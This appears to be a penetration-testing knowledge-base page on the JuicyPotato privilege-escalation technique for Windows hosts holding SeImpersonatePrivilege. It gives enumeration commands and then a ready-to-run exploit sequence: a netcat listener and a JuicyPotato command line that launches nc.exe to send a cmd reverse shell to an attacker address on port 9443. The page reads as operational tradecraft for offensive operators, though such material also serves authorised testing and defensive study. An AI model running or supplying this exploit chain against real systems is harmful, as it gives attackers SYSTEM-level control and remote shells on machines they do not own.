Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeImpersonatePrivilege

JuicyPotato

JuicyPotato targets older COM/DCOM behavior and is build-dependent.

It is generally not reliable on Windows 10 1809 and Server 2019 or newer. Use it only when the target build, privilege, and CLSID conditions match.

For newer builds, check SigmaPotato.

Keep in mind, potato attacks are entirely family of exploits, each behaving slightly different than the other but operationally achieve the same objective.

When enumerating JuicyPotato opportunities, try to identify:

  • SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
  • Windows version and build
  • Working CLSID for the target OS
  • Local COM/RPC behavior not blocked by firewall or hardening
  • Payload path and listener

Enumeration

Confirm OS version:

systeminfo

Confirm privileges:

whoami /priv

Interesting findings include:

  • Older Windows build
  • SeImpersonatePrivilege present
  • Compatible CLSID identified
  • Tool execution is not blocked

Once the CLSID and build are confirmed, execute a controlled payload. CLSID lists exist around the internet.

Exploit

  1. Start a listener.
nc -lnvp 9443
  1. Execute JuicyPotato.
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\nc.exe 10.10.14.3 9443 -e cmd" -t * -c {CLSID}
  1. Verify context.
whoami
whoami /priv

If the tool fails, do not keep throwing random CLSIDs at the target. Recheck build, service context, token privileges, local firewall behavior, and the required COM/RPC path.